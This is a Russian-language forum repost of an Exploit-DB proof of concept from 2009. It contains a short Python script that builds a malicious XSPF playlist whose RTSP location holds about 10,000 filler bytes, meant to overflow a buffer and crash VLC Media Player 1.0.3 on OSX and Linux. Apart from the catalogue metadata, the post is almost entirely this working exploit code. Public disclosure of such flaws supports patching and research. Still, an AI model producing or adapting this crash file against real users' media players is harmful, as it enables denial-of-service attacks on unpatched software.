Exploit VideoLAN VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10334
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2009-12-06
Код:
#!/usr/bin/env python

###########################################################################
#
# VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)
# Found By:     Dr_IDE
# Tested On:    OSX 10.6.2                      (v1.0.3)
# Tested On:    Ubuntu 9 [2.6.28-15-generic]    (v0.9.9a)
# Tested On:    No Go on Windows
#
###########################################################################

header1  = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>rtsp://localhost@localhost/foo/#{")

payload  = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)

header2  = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");

try:
    f1 = open("vlc_1.0.X.xspf","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("\nExploit file created!\n")
except:
    print "Error"

#[pocoftheday.blogspot.com]
 
Источник
www.exploit-db.com

Похожие темы